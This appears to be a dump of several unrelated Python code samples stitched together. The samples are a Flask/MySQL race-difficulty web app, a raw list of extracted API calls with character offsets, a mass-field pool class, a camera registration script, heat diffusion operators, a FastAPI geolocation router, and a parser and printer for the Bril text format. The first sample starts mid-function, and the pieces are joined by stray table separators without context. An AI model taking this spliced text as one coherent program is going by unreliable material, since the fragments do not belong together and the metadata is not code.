        query = """SELECT meeting_id, sum_up, sigma, diff FROM race_info WHERE meeting_id = %s"""
        key = str(ID)
    cur.execute(query, (str(key), ))
    record = cur.fetchall()
    totals = [0.0, 0.0, 0.0]
    for _, sum_up, sigma, diff in record:
        totals[0] += sum_up
        totals[1] += sigma
        totals[2] += diff
    count = len(record)
    return [t / count for t in totals]
def get_beta(race):
    """Return the regression coefficients [age, sex, time, sum_up, sigma, diff] for a race type."""
    cur.execute("""SELECT age,sex,time,sum_up,sigma,diff FROM beta WHERE race_type = %s""", (str(race), ))
    first_row = cur.fetchall()[0]
    return list(first_row)
def get_score(betax, race_type):
    """Map a raw regression score onto the difficulty distribution.

    Scans the d_dist bins and returns the y value of the bin whose
    [x - dx/2, x + dx/2) interval contains *betax*; -1.0 when betax falls
    outside every bin.
    """
    cur.execute("""SELECT * FROM d_dist WHERE race_type = %s""", (str(race_type), ))
    rows = cur.fetchall()
    for row in rows:
        center, height, width = row[1], row[2], row[3]
        half_width = width * 0.5
        if (betax >= center - half_width) and (betax < center + half_width):
            return height
    return -1.0
def get_avg(column_name, race_type):
    """Average of one race_info column over a race type; 0.0 for unknown columns."""
    query = """SELECT AVG(min_time), AVG(sum_up), AVG(sigma), AVG(diff), AVG(dt) FROM race_info WHERE race_type = %s"""
    cur.execute(query, [str(race_type)])
    averages = cur.fetchall()[0]
    by_column = dict(zip(('min_time', 'sum_up', 'sigma', 'diff', 'dt'), averages))
    if column_name in by_column:
        return float(by_column[column_name])
    return 0.0
def get_elevation_dict(meeting_id, race_type):
    """Return [distances_mi, elevations_m] for a course's GPS profile.

    Bin indices are rescaled from sample count to miles using the race's
    total distance from ``conversion``, and the trace is downsampled to
    every 10th bin to keep the plot light.
    """
    sql_select_query = """SELECT bin,elevation FROM gpx WHERE meeting_id = %s"""
    cur.execute(sql_select_query, [str(meeting_id)])
    record = cur.fetchall()
    bins = {row[0]: (row[0], row[1]) for row in record}
    norm = (1.0 / float(len(record))) * float(conversion[str(race_type)])
    xval, yval = [], []
    for key, (bin_idx, elevation) in bins.items():
        # BUG FIX: was `key%10 is 0` — identity comparison on ints relies on
        # CPython's small-int cache and raises a SyntaxWarning on 3.8+.
        if key % 10 == 0:  # reduce the granularity of the arrays
            xval.append(bin_idx * norm)
            yval.append(elevation)
    return [xval, yval]
# Pre-load the event listings once at import time, keyed by race type; the
# route handlers above read this to populate their dropdowns.
AllEvents = {}
AllEvents['10K'] = sql_get_events("10K")
AllEvents['Mar'] = sql_get_events("Mar")
| [
"flask.render_template",
"flask.request.args.get",
"matplotlib.pyplot.grid",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.switch_backend",
"flaskext.mysql.MySQL",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.close",
"app.app.route",
"matplotlib.pyplot.scatter",
"random.choice",
"matplotlib... | [((201, 226), 'matplotlib.pyplot.switch_backend', 'plt.switch_backend', (['"""agg"""'], {}), "('agg')\n", (219, 226), True, 'import matplotlib.pyplot as plt\n'), ((405, 412), 'flaskext.mysql.MySQL', 'MySQL', ([], {}), '()\n', (410, 412), False, 'from flaskext.mysql import MySQL\n'), ((823, 837), 'app.app.route', 'app.route', (['"""/"""'], {}), "('/')\n", (832, 837), False, 'from app import app\n'), ((839, 858), 'app.app.route', 'app.route', (['"""/index"""'], {}), "('/index')\n", (848, 858), False, 'from app import app\n'), ((1004, 1023), 'app.app.route', 'app.route', (['"""/about"""'], {}), "('/about')\n", (1013, 1023), False, 'from app import app\n'), ((1080, 1101), 'app.app.route', 'app.route', (['"""/contact"""'], {}), "('/contact')\n", (1089, 1101), False, 'from app import app\n'), ((1162, 1182), 'app.app.route', 'app.route', (['"""/output"""'], {}), "('/output')\n", (1171, 1182), False, 'from app import app\n'), ((951, 1001), 'flask.render_template', 'render_template', (['"""index.html"""'], {'AllEvents': 'AllEvents'}), "('index.html', AllEvents=AllEvents)\n", (966, 1001), False, 'from flask import render_template, url_for, request, Flask\n'), ((1048, 1077), 'flask.render_template', 'render_template', (['"""about.html"""'], {}), "('about.html')\n", (1063, 1077), False, 'from flask import render_template, url_for, request, Flask\n'), ((1128, 1159), 'flask.render_template', 'render_template', (['"""contact.html"""'], {}), "('contact.html')\n", (1143, 1159), False, 'from flask import render_template, url_for, request, Flask\n'), ((1940, 1959), 'pandas.Series', 'pd.Series', (['age_type'], {}), '(age_type)\n', (1949, 1959), True, 'import pandas as pd\n'), ((1979, 2001), 'pandas.Series', 'pd.Series', (['gender_type'], {}), '(gender_type)\n', (1988, 2001), True, 'import pandas as pd\n'), ((3552, 3754), 'flask.render_template', 'render_template', (['"""output.html"""'], {'betax': 'betax', 'score': 'score', 'course_score': 'course_score', 'event': 
'event', 'beta': 'beta', 'args': 'args', 'name': 'name', 'name_gpx': 'name_gpx', 'name_score': 'name_score', 'name_diff': 'name_diff'}), "('output.html', betax=betax, score=score, course_score=\n course_score, event=event, beta=beta, args=args, name=name, name_gpx=\n name_gpx, name_score=name_score, name_diff=name_diff)\n", (3567, 3754), False, 'from flask import render_template, url_for, request, Flask\n'), ((4864, 4876), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4874, 4876), True, 'import matplotlib.pyplot as plt\n'), ((4886, 4902), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (4897, 4902), True, 'import matplotlib.pyplot as plt\n'), ((5161, 5207), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Relative Difficulty"""'], {'fontsize': '(16)'}), "('Relative Difficulty', fontsize=16)\n", (5171, 5207), True, 'import matplotlib.pyplot as plt\n'), ((5212, 5257), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Score Distribution"""'], {'fontsize': '(16)'}), "('Score Distribution', fontsize=16)\n", (5222, 5257), True, 'import matplotlib.pyplot as plt\n'), ((5263, 5281), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5279, 5281), True, 'import matplotlib.pyplot as plt\n'), ((5462, 5479), 'matplotlib.pyplot.savefig', 'plt.savefig', (['name'], {}), '(name)\n', (5473, 5479), True, 'import matplotlib.pyplot as plt\n'), ((5484, 5498), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (5493, 5498), True, 'import matplotlib.pyplot as plt\n'), ((6227, 6239), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6237, 6239), True, 'import matplotlib.pyplot as plt\n'), ((6249, 6265), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (6260, 6265), True, 'import matplotlib.pyplot as plt\n'), ((6270, 6280), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (6278, 6280), True, 'import matplotlib.pyplot as plt\n'), ((6290, 6363), 'matplotlib.pyplot.scatter', 
'plt.scatter', (['Time', 'Score'], {'c': '"""black"""', 's': '(30)', 'marker': '"""o"""', 'label': '"""All Scores"""'}), "(Time, Score, c='black', s=30, marker='o', label='All Scores')\n", (6301, 6363), True, 'import matplotlib.pyplot as plt\n'), ((6363, 6441), 'matplotlib.pyplot.scatter', 'plt.scatter', (['ThisTime', 'ThisScore'], {'c': '"""red"""', 's': '(40)', 'marker': '"""^"""', 'label': '"""This Race"""'}), "(ThisTime, ThisScore, c='red', s=40, marker='^', label='This Race')\n", (6374, 6441), True, 'import matplotlib.pyplot as plt\n'), ((6555, 6607), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Average Finish Time (min)"""'], {'fontsize': '(15)'}), "('Average Finish Time (min)', fontsize=15)\n", (6565, 6607), True, 'import matplotlib.pyplot as plt\n'), ((6611, 6657), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Relative Difficulty"""'], {'fontsize': '(15)'}), "('Relative Difficulty', fontsize=15)\n", (6621, 6657), True, 'import matplotlib.pyplot as plt\n'), ((6661, 6679), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (6677, 6679), True, 'import matplotlib.pyplot as plt\n'), ((6864, 6881), 'matplotlib.pyplot.savefig', 'plt.savefig', (['name'], {}), '(name)\n', (6875, 6881), True, 'import matplotlib.pyplot as plt\n'), ((6886, 6900), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (6895, 6900), True, 'import matplotlib.pyplot as plt\n'), ((7394, 7406), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (7404, 7406), True, 'import matplotlib.pyplot as plt\n'), ((7417, 7460), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(2, 2)', '(0, 0)'], {'colspan': '(2)'}), '((2, 2), (0, 0), colspan=2)\n', (7433, 7460), True, 'import matplotlib.pyplot as plt\n'), ((7465, 7475), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (7473, 7475), True, 'import matplotlib.pyplot as plt\n'), ((7530, 7567), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Importance"""'], {'fontsize': '(12)'}), "('Importance', 
fontsize=12)\n", (7540, 7567), True, 'import matplotlib.pyplot as plt\n'), ((7572, 7614), 'matplotlib.pyplot.title', 'plt.title', (['"""Regression Feature Importance"""'], {}), "('Regression Feature Importance')\n", (7581, 7614), True, 'import matplotlib.pyplot as plt\n'), ((7619, 7666), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xint', 'labels'], {'rotation': '(0)', 'wrap': '(True)'}), '(xint, labels, rotation=0, wrap=True)\n', (7629, 7666), True, 'import matplotlib.pyplot as plt\n'), ((7672, 7690), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (7688, 7690), True, 'import matplotlib.pyplot as plt\n'), ((7967, 8010), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(2, 2)', '(1, 0)'], {'colspan': '(1)'}), '((2, 2), (1, 0), colspan=1)\n', (7983, 8010), True, 'import matplotlib.pyplot as plt\n'), ((8234, 8278), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Finish Time (min)"""'], {'fontsize': '(12)'}), "('Finish Time (min)', fontsize=12)\n", (8244, 8278), True, 'import matplotlib.pyplot as plt\n'), ((8283, 8361), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xint', "['Course \\n Time', 'Average \\n Time']"], {'rotation': '(0)', 'wrap': '(True)'}), "(xint, ['Course \\n Time', 'Average \\n Time'], rotation=0, wrap=True)\n", (8293, 8361), True, 'import matplotlib.pyplot as plt\n'), ((8622, 8640), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (8638, 8640), True, 'import matplotlib.pyplot as plt\n'), ((8716, 8759), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(2, 2)', '(1, 1)'], {'colspan': '(1)'}), '((2, 2), (1, 1), colspan=1)\n', (8732, 8759), True, 'import matplotlib.pyplot as plt\n'), ((8794, 8841), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Course Elevation (m)"""'], {'fontsize': '(12)'}), "('Course Elevation (m)', fontsize=12)\n", (8804, 8841), True, 'import matplotlib.pyplot as plt\n'), ((8846, 8886), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Distance (mi)"""'], {'fontsize': 
'(10)'}), "('Distance (mi)', fontsize=10)\n", (8856, 8886), True, 'import matplotlib.pyplot as plt\n'), ((9019, 9037), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (9035, 9037), True, 'import matplotlib.pyplot as plt\n'), ((9225, 9242), 'matplotlib.pyplot.savefig', 'plt.savefig', (['name'], {}), '(name)\n', (9236, 9242), True, 'import matplotlib.pyplot as plt\n'), ((9980, 9992), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9990, 9992), True, 'import matplotlib.pyplot as plt\n'), ((10004, 10020), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (10015, 10020), True, 'import matplotlib.pyplot as plt\n'), ((10320, 10345), 'matplotlib.pyplot.title', 'plt.title', (['"""GPS Features"""'], {}), "('GPS Features')\n", (10329, 10345), True, 'import matplotlib.pyplot as plt\n'), ((10425, 10435), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (10433, 10435), True, 'import matplotlib.pyplot as plt\n'), ((10440, 10461), 'matplotlib.pyplot.savefig', 'plt.savefig', (['name_gpx'], {}), '(name_gpx)\n', (10451, 10461), True, 'import matplotlib.pyplot as plt\n'), ((10466, 10480), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (10475, 10480), True, 'import matplotlib.pyplot as plt\n'), ((10486, 10501), 'matplotlib.pyplot.close', 'plt.close', (['fig2'], {}), '(fig2)\n', (10495, 10501), True, 'import matplotlib.pyplot as plt\n'), ((1458, 1481), 'flask.request.args.get', 'request.args.get', (['"""age"""'], {}), "('age')\n", (1474, 1481), False, 'from flask import render_template, url_for, request, Flask\n'), ((1505, 1531), 'flask.request.args.get', 'request.args.get', (['"""gender"""'], {}), "('gender')\n", (1521, 1531), False, 'from flask import render_template, url_for, request, Flask\n'), ((1555, 1579), 'flask.request.args.get', 'request.args.get', (['"""race"""'], {}), "('race')\n", (1571, 1579), False, 'from flask import render_template, url_for, request, Flask\n'), ((1603, 1628), 
'flask.request.args.get', 'request.args.get', (['"""event"""'], {}), "('event')\n", (1619, 1628), False, 'from flask import render_template, url_for, request, Flask\n'), ((1768, 1824), 'flask.render_template', 'render_template', (['"""value_error.html"""'], {'AllEvents': 'AllEvents'}), "('value_error.html', AllEvents=AllEvents)\n", (1783, 1824), False, 'from flask import render_template, url_for, request, Flask\n'), ((1863, 1919), 'flask.render_template', 'render_template', (['"""value_error.html"""'], {'AllEvents': 'AllEvents'}), "('value_error.html', AllEvents=AllEvents)\n", (1878, 1919), False, 'from flask import render_template, url_for, request, Flask\n'), ((8386, 8442), 'matplotlib.patches.Patch', 'Patch', ([], {'facecolor': 'palette2[0]', 'label': '"""Course Median Time"""'}), "(facecolor=palette2[0], label='Course Median Time')\n", (8391, 8442), False, 'from matplotlib.patches import Patch\n'), ((2025, 2046), 'pandas.Series', 'pd.Series', (['event_type'], {}), '(event_type)\n', (2034, 2046), True, 'import pandas as pd\n'), ((5307, 5358), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (5320, 5358), False, 'import random\n'), ((6705, 6756), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (6718, 6756), False, 'import random\n'), ((9068, 9119), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (9081, 9119), False, 'import random\n')] |
# vim: set ff=unix expandtab ts=4 sw=4:
from copy import deepcopy
from .TsTpMassFields import TsTpMassFieldsPerPool
class CompatibleTsTpMassFieldsPerPool(TsTpMassFieldsPerPool):
    """A per-pool collection of mass distributions (one entry per pool)
    whose fields share a common time step (tss) and are resized to a
    common Ts extent so that mass can be transferred between any pools."""

    def __init__(self, normal_list):
        """Build the collection from ``normal_list`` of mass fields.

        Raises:
            Exception: if the list is empty or the fields disagree on tss.
        """
        # Local import: only needed to build the mismatch error message.
        from string import Template

        # make sure it has at least one entry
        if not len(normal_list) > 0:
            raise Exception("There has to be at least one pool")
        # Check that all *input* fields share the same tss.
        # (The original iterated ``self``, which is still empty before
        # super().__init__ runs, so the check could never fire and
        # ``Template`` was referenced without being imported.)
        first_tss = normal_list[0].tss
        for i, el in enumerate(normal_list):
            if el.tss != first_tss:
                raise Exception(
                    Template(
                        "Element number ${i} had tts=${etss} while the first element of the list had tss=${first_tss}"
                    ).substitute(i=i, etss=el.tss, first_tss=first_tss)
                )
        # All pools must be able to receive material from any other pool:
        # the maximum system age for every pool is the maximum over all
        # pools, so every field is resized to the largest Ts extent.
        overall_number_of_Ts_entries = max(
            field.number_of_Ts_entries for field in normal_list
        )
        for el in normal_list:
            el.resize(overall_number_of_Ts_entries)
        # Populate the underlying dict-like structure: pool index -> field.
        super().__init__({k: val for k, val in enumerate(normal_list)})

    def advanced(
        self, external_inputs, internal_death_rate_fields, outward_death_rate_fields
    ):
        """Return a new collection advanced by one time step: remove
        external and internal losses, redistribute internal gains, shift
        forward in time and receive the external inputs."""
        # Note that the fields in res become one tss bigger in Ts size
        # although we start with a copy.
        res = deepcopy(self)
        ol = res.external_losses(outward_death_rate_fields)
        res.remove(ol)
        il = self.internal_losses(internal_death_rate_fields)
        res.remove(il)
        gains = il.gains
        res.receive(gains)
        res.shift()  # move forward in time which increases size of the fields
        res.receive_external(external_inputs)
        return res

    @property
    def number_of_pools(self):
        """Number of pools (one mass field per pool)."""
        return len(self)
| [
"copy.deepcopy"
] | [((1860, 1874), 'copy.deepcopy', 'deepcopy', (['self'], {}), '(self)\n', (1868, 1874), False, 'from copy import deepcopy\n')] |
"""
An app script to run registration between two cameras from the command line.
Copyright (C) Microsoft Corporation. All rights reserved.
"""
# Standard Libraries.
import argparse
# Calibration tools.
from camera_tools import register
# ------------------------------------------------------------------------------
def parse_args():
    """
    Build and parse the command-line arguments for the registration run.

    Returns:
        cmd_args -- Namespace holding the parsed command line options.
    """
    parser = argparse.ArgumentParser(description="Get extrinsics for cameras.")
    # Every option is required; declare them data-driven to avoid repetition.
    required_options = [
        ("-ia", "--img-a", "Full path to image from camera A."),
        ("-ib", "--img-b", "Full path to image from camera B."),
        ("-t", "--template", "Full path to Charuco board template file."),
        ("-ca", "--calib-a", "Full path to calibration file from camera A."),
        ("-cb", "--calib-b", "Full path to calibration file from camera B."),
        ("-o", "--out-dir", "Output directory for full calibration blob."),
    ]
    for short_flag, long_flag, help_text in required_options:
        parser.add_argument(short_flag, long_flag, required=True, help=help_text)
    cmd_args = parser.parse_args()
    return cmd_args
if __name__ == "__main__":
    # Script entry point: parse the CLI arguments and run pairwise camera
    # registration, unpacking the rotation/translation and the per-camera
    # RMS errors (in pixels and radians) returned by ``register``.
    args = parse_args()
    rotation, translation, rms1_pixels, rms1_rad, rms2_pixels, rms2_rad = \
        register(args.img_a,
                 args.img_b,
                 args.template,
                 args.calib_a,
                 args.calib_b,
                 args.out_dir)
| [
"camera_tools.register",
"argparse.ArgumentParser"
] | [((499, 565), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Get extrinsics for cameras."""'}), "(description='Get extrinsics for cameras.')\n", (522, 565), False, 'import argparse\n'), ((1400, 1493), 'camera_tools.register', 'register', (['args.img_a', 'args.img_b', 'args.template', 'args.calib_a', 'args.calib_b', 'args.out_dir'], {}), '(args.img_a, args.img_b, args.template, args.calib_a, args.calib_b,\n args.out_dir)\n', (1408, 1493), False, 'from camera_tools import register\n')] |
#!/usr/bin/env python3
from shutil import which
import sys
def check_program_exists(program):
    """Exit the process if *program* cannot be found on PATH.

    Args:
        program: Executable name (or path) looked up with ``shutil.which``.
    """
    if which(program) is None:
        print('ERROR: Could not find {}. Is it installed? Is PATH setup properly?'.format(program))
        # Exit with a non-zero status so callers and shell scripts can
        # detect the failure (the original exited with status 0).
        sys.exit(1)
"shutil.which",
"sys.exit"
] | [((104, 118), 'shutil.which', 'which', (['program'], {}), '(program)\n', (109, 118), False, 'from shutil import which\n'), ((236, 246), 'sys.exit', 'sys.exit', ([], {}), '()\n', (244, 246), False, 'import sys\n')] |
import params
import numpy as np
def calc_min_delta_t(delta_x, alpha, v_max) -> float:
    """Return the stable explicit time step for the simulation.

    Takes the minimum of 1, the diffusion stability limit
    ``delta_x**2 / (4 * alpha)`` and the advection (CFL) limit
    ``delta_x / v_max``. The result is generally a float, so the
    original ``-> int`` annotation was incorrect.
    """
    return min(1, 1 / 4 * delta_x ** 2 / alpha, delta_x / v_max)
def adjust_boundary(T, v_x, v_y):
    # Apply boundary conditions in place on temperature T and vertical
    # velocity v_y.
    # NOTE(review): v_x is accepted but never modified here — confirm
    # whether x-velocity boundaries are handled elsewhere.
    T[0, :] = params.T_h  # heated wall held at fixed temperature T_h
    T[-1, :] = T[-2, :]   # zero-gradient (copy neighbour) at the far wall
    T[:, 0] = T[:, 1]     # zero-gradient at the side walls
    T[:, -1] = T[:, -2]
    v_y[0, :] = 0         # no vertical flow through the heated boundary
    v_y[-1, :] = v_y[-2, :]  # zero-gradient velocity at the remaining walls
    v_y[:, 0] = v_y[:, 1]
    v_y[:, -1] = v_y[:, -2]
def diffusion_x_op(T, alpha, delta_t, delta_x):
    """Apply one explicit diffusion step along the second (x) axis,
    updating the interior of T in place."""
    center = T[1:-1, 1:-1]
    left = T[1:-1, 0:-2]
    right = T[1:-1, 2:]
    coeff = alpha * delta_t / delta_x ** 2
    T[1:-1, 1:-1] = center + coeff * (left - 2 * center + right)
def diffusion_y_op(T, alpha, delta_t, delta_x):
    """Apply one explicit diffusion step along the first (y) axis,
    updating the interior of T in place."""
    k = alpha * delta_t / delta_x ** 2
    T[1:-1, 1:-1] = T[1:-1, 1:-1] + k * (
        T[0:-2, 1:-1] - 2 * T[1:-1, 1:-1] + T[2:, 1:-1]
    )
def heat_convection_y_op(T, v_y, delta_t, delta_x):
    """First-order upwind advection of T by v_y along the first axis,
    updating the interior of T in place."""
    courant = delta_t / delta_x
    T[1:-1, 1:-1] = T[1:-1, 1:-1] - courant * v_y[1:-1, 1:-1] * (
        T[1:-1, 1:-1] - T[0:-2, 1:-1]
    )
def mom_convection_y_op(T, v_y, delta_t, delta_x):
    """Advance v_y in place: a buoyancy source term plus first-order
    upwind self-advection along the first axis."""
    t_mid = T[1:-1, 1:-1]
    t_above = T[2:, 1:-1]
    v_mid = v_y[1:-1, 1:-1]
    v_below = v_y[0:-2, 1:-1]
    # Buoyancy only where the relative temperature difference is positive.
    buoyancy = params.g * np.maximum(0.0, (t_mid - t_above) / t_above)
    v_y[1:-1, 1:-1] = (
        v_mid + delta_t * buoyancy - delta_t / delta_x * v_mid * (v_mid - v_below)
    )
| [
"numpy.zeros"
] | [((1184, 1205), 'numpy.zeros', 'np.zeros', (['T_cen.shape'], {}), '(T_cen.shape)\n', (1192, 1205), True, 'import numpy as np\n')] |
"""
Routes here:
- Where am I ?
- Return the street, city and country a given geolocation point is at.
- Linear distance (Haversine)
- Return the linear distance on a globe given two geo-coordinates.
"""
from fastapi import APIRouter
from src.service.HaversineService import linear_distance
from src.model.linearDistance import linearDistance
from src.model.pairCoordinate import pairCoordinate
from src.service.whereAmIService import getLocation
router = APIRouter()
@router.post("/linearDistance")
def get_linear_distance(distance: linearDistance):
    """Return the Haversine (linear) distance in kilometers for the
    given pair of coordinates."""
    return {"Kilometers": linear_distance(distance)}
@router.post("/whereAmI")
def get_where_am_i(local: pairCoordinate):
    """Return the location (street, city, country) found at the given
    geolocation point."""
    return {"Location": getLocation(local)}
| [
"src.service.HaversineService.linear_distance",
"fastapi.APIRouter",
"src.service.whereAmIService.getLocation"
] | [((469, 480), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (478, 480), False, 'from fastapi import APIRouter\n'), ((593, 618), 'src.service.HaversineService.linear_distance', 'linear_distance', (['distance'], {}), '(distance)\n', (608, 618), False, 'from src.service.HaversineService import linear_distance\n'), ((753, 771), 'src.service.whereAmIService.getLocation', 'getLocation', (['local'], {}), '(local)\n', (764, 771), False, 'from src.service.whereAmIService import getLocation\n')] |
"""A text format for Bril.
This module defines both a parser and a pretty-printer for a
human-editable representation of Bril programs. There are two commands:
`bril2txt`, which takes a Bril program in its (canonical) JSON format and
pretty-prints it in the text format, and `bril2json`, which parses the
format and emits the ordinary JSON representation.
"""
import lark
import sys
import json
__version__ = '0.0.1'
# Text format parser.
GRAMMAR = """
start: imp* func*
imp: "import" CNAME ";"
func: CNAME arg* "{" instr* "}" | CNAME arg* ":" type "{" instr* "}"
def_func: "def" func
?instr: def_func | const | vop | eop | label
const.4: IDENT ":" type "=" "const" lit ";"
vop.3: IDENT ":" type "=" CNAME IDENT* ";"
eop.2: CNAME IDENT* ";"
label.1: IDENT ":"
lit: SIGNED_INT -> int
| BOOL -> bool
type: CNAME
arg: IDENT | "(" IDENT ":" type ")"
BOOL: "true" | "false"
IDENT: ("_"|"%"|LETTER) ("_"|"%"|"."|LETTER|DIGIT)*
COMMENT: /#.*/
%import common.SIGNED_INT
%import common.WS
%import common.CNAME
%import common.LETTER
%import common.DIGIT
%ignore WS
%ignore COMMENT
""".strip()
class JSONTransformer(lark.Transformer):
    """Transform the lark parse tree of a Bril text-format program into
    the plain dict/list structures of the canonical JSON format."""
    def start(self, items):
        # Leading Token items are module names produced by `imp`; all
        # remaining items are function dicts.
        imports = []
        while len(items) > 0 and type(items[0]) == lark.lexer.Token:
            imports.append(items.pop(0))
        data = {'functions': items}
        if len(imports) > 0:
            data['imports'] = imports
        return data
    def imp(self, items):
        return items.pop(0)  # The module name
    def func(self, items):
        # First item is the function name; then zero or more `arg`
        # subtrees, an optional return type, and finally instructions.
        name = items.pop(0)
        args = []
        while (len(items) > 0 and type(items[0]) == lark.tree.Tree and
               items[0].data == "arg"):
            arg = items.pop(0).children
            # A bare IDENT arg has no type; (IDENT : type) carries one.
            args.append(
                dict(name=arg[0], type=arg[1] if len(arg) > 1 else None))
        # A `type` rule yields a plain str; anything else means no type.
        function_type = items.pop(0) if type(items[0]) == str else None
        data = {'name': str(name), 'instrs': items}
        if len(args):
            data['args'] = args
        if function_type is not None:
            data['type'] = function_type
        return data
    def def_func(self, items):
        # `def` is optional sugar; unwrap to the plain function dict.
        return items.pop(0)
    def const(self, items):
        # IDENT ":" type "=" "const" lit
        dest = items.pop(0)
        type = items.pop(0)
        val = items.pop(0)
        return {
            'op': 'const',
            'dest': str(dest),
            'type': type,
            'value': val,
        }
    def vop(self, items):
        # Value operation: IDENT ":" type "=" CNAME IDENT*
        dest = items.pop(0)
        type = items.pop(0)
        op = items.pop(0)
        return {
            'op': str(op),
            'dest': str(dest),
            'type': type,
            'args': [str(t) for t in items],
        }
    def eop(self, items):
        # Effect operation (no destination): CNAME IDENT*
        op = items.pop(0)
        return {
            'op': str(op),
            'args': [str(t) for t in items],
        }
    def label(self, items):
        # Bare `IDENT:` marks a label in the instruction stream.
        name = items.pop(0)
        return {
            'label': name,
        }
    def int(self, items):
        return int(str(items[0]))
    def bool(self, items):
        if str(items[0]) == 'true':
            return True
        else:
            return False
    def type(self, items):
        return str(items[0])
def parse_bril(txt):
    """Parse Bril text format and return the canonical JSON as a string.

    Raises:
        RuntimeError: if any function name is defined more than once.
    """
    parser = lark.Lark(GRAMMAR)
    tree = parser.parse(txt)
    data = JSONTransformer().transform(tree)
    function_names = [f['name'] for f in data['functions']]
    # Detect duplicate function definitions. (The original used
    # ``f in unique and not unique.add(f)``, but ``and`` short-circuits
    # before ``add`` ever runs, so the set stayed empty and no duplicate
    # was ever reported.)
    seen = set()
    dups = []
    for name in function_names:
        if name in seen:
            dups.append(name)
        seen.add(name)
    if len(dups) > 0:
        raise RuntimeError(
            'Function(s) defined twice: {}'.format(', '.join(dups)))
    return json.dumps(data, indent=2, sort_keys=True)
def unroll_imports(prog):
    """Recursively load the ``<module>.bril`` files named in
    ``prog['imports']``, merge all their functions into one program and
    return that program as a JSON string. Exits with status 1 if an
    imported file cannot be read; raises RuntimeError when a function
    name is defined in more than one module."""
    if 'imports' not in prog:
        return json.dumps(prog, indent=2, sort_keys=True)
    to_import = set(prog['imports'])
    all_functions_map = {f['name']: f for f in prog['functions']}
    imported = set()
    while len(to_import) > 0:
        module_name = to_import.pop()
        imported.add(module_name)
        try:
            # Modules are looked up as "<name>.bril" in the current
            # working directory and parsed from text format.
            with open('{}.bril'.format(module_name)) as f:
                loaded_prog = json.loads(parse_bril(f.read()))
        except IOError:
            sys.stderr.write('Failed to load {}.bril\n'.format(module_name))
            sys.stderr.flush()
            sys.exit(1)
        # Queue transitive imports that have not been visited yet.
        imports = set(loaded_prog.get('imports', []))
        to_import.update(imports.difference(imported))
        # A function name may only be defined once across all modules.
        dups = {f['name'] for f in loaded_prog['functions']}
        dups.intersection_update(all_functions_map.keys())
        if len(dups) > 0:
            raise RuntimeError(
                'Function(s) defined twice: {}'.format(', '.join(dups)))
        all_functions_map.update({f['name']: f for f in loaded_prog['functions']})
    return json.dumps(
        dict(functions=list(all_functions_map.values())),
        indent=2,
        sort_keys=True)
# Text format pretty-printer.
def instr_to_string(instr):
    """Render a single Bril instruction dict in the text format."""
    operands = ' '.join(instr.get('args', []))
    if instr['op'] == 'const':
        # Constants print their literal; booleans are lowercased.
        literal = str(instr['value']).lower()
        return f"{instr['dest']}: {instr['type']} = const {literal}"
    if 'dest' in instr:
        # Value operation: destination, type, opcode, arguments.
        return f"{instr['dest']}: {instr['type']} = {instr['op']} {operands}"
    # Effect operation: opcode and arguments only.
    return f"{instr['op']} {operands}"
def print_instr(instr):
    """Print one instruction, indented two spaces, with a semicolon."""
    print(f"  {instr_to_string(instr)};")
def print_label(label):
    """Print a label line in the form ``name:``."""
    print(f"{label['label']}:")
def print_func(func):
    """Print a function: header line, its instructions/labels, and the
    closing brace.

    The original passed ``func.get('type', 'void')`` as an extra argument
    to a one-placeholder format string, so the return type was silently
    dropped on output. A ``name: type {`` header (which the parser
    grammar already accepts) is now emitted when the function has a type.
    """
    if func.get('type') is not None:
        print('{}: {} {{'.format(func['name'], func['type']))
    else:
        print('{} {{'.format(func['name']))
    for instr_or_label in func['instrs']:
        if 'label' in instr_or_label:
            print_label(instr_or_label)
        else:
            print_instr(instr_or_label)
    print('}')
def print_prog(prog):
    """Pretty-print every function of a Bril program."""
    for function in prog['functions']:
        print_func(function)
# Command-line entry points.
def bril2json():
    """Read Bril text format from stdin and print the JSON form."""
    source = sys.stdin.read()
    print(parse_bril(source))
